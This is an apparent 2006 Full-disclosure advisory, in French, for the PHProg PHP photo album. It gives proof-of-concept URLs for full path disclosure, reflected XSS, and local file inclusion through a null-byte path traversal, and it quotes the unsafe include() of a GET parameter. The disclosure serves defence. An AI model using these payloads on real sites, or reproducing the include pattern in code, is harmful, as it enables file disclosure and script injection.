 |
|
|
|
| From: | cdg393 <cdg393_(at)_gmail.com> | | Date: | 11 сентября 2006 г. | | Subject: | [Full-disclosure] PHProg : Local File Inclusion + XSS + Full path disclosure |
(11/09/06)
* Produit vulnerable : PHProg ( Album photo en PHP )
* Site officiel du produit : http://www.PHProg.com/
* Failles de securite decelees :
1] Full path disclosure : http://localhost/PHProg/?id=1&album=cdg393
2] Cross Site Scripting ( XSS ) : http://localhost/PHProg/?id=1&album=
<script>alert('cdg393')</script>
3] Local File Inclusion :
http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00
Ligne 59 => $lang=$_GET['lang'];
Ligne 61 => include("lang/$lang.php");
* Credits : cdg393 : cdg.new.fr =)
|
|
|
|
|
|
|
|